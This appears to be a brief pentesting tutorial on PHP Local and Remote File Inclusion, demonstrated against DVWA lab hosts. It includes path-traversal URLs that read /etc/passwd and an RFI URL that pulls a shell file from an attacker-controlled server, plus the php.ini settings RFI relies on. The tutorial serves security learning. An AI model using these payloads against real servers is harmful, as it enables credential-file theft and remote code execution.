LFI and RFI

LFI Basics

Local File Inclusion (LFI) vulnerabilities allow an attacker to use specifically crafted requests to read local files on the web server (including log files and configuration files containing password hashes or even clear text passwords). LFI vulnerabilities can also lead to remote code execution on the target web server and a denial of service (DoS). Most, if not all, web application frameworks support file inclusion and file inclusion vulnerabilities are often the result of poor user input validation.

  • We can simply pull out lfi with following syntax :

Consider this example

http://192.168.119.13/include?page=index.php

It calling index.php through php function so we can try if it can able to call and print other files too for us

http://192.168.119.13/include?page=/etc/passwd

http://192.168.119.13/include?page=../../../../../etc/passwd

And if we got /etc/passwd output back , target is vulnerable to LFI

RFI Basic

  • RFI stands for Remote File Inclusion. Where LFI includes files on stored on the local system, RFI includes files from remote locations, on a web server for example. Let’s see if we can include a remote file too on the DVWA application by entering an external URL in the page parameter. For this demonstration we have loaded a text file named exploit.txt on a remote server with the IP address 172.16.1.4 (because the text file is on a remote server we don’t have to work with a current working directory with the ../ value but we can reference it directly):

  • Remote File Inclusions (RFI) are very similar to LFI but affect files on remote servers instead of files on the local web server. Remote files can include malicious code that executes on the server in the context of the user running the web server or on any client devices that visit a compromised webpage.

We can exploit rfi with adding our own shell at the end of vulnerable endpoint , something like this

http://10.11.1.250/dvwa/vulnerabilities/fi/?page=http://172.16.1.4/exploit.txt

Required Settings to work RFI

The first warning indicates that URL file-access is disabled in the server configuration. Without URL file access enabled we’re unable to include files from remote locations, such as our attack box.To successfully include remote files in PHP there are a few parameters in the "php.ini" file that must be enabled:

allow_url_fopen = On

allow_url_include = On

This settings can be found on phpinfo.php page so we can check if following configuration is allowed or not to successfully attack rfi

http://10.11.1.250/dvwa/phpinfo.php

Last updated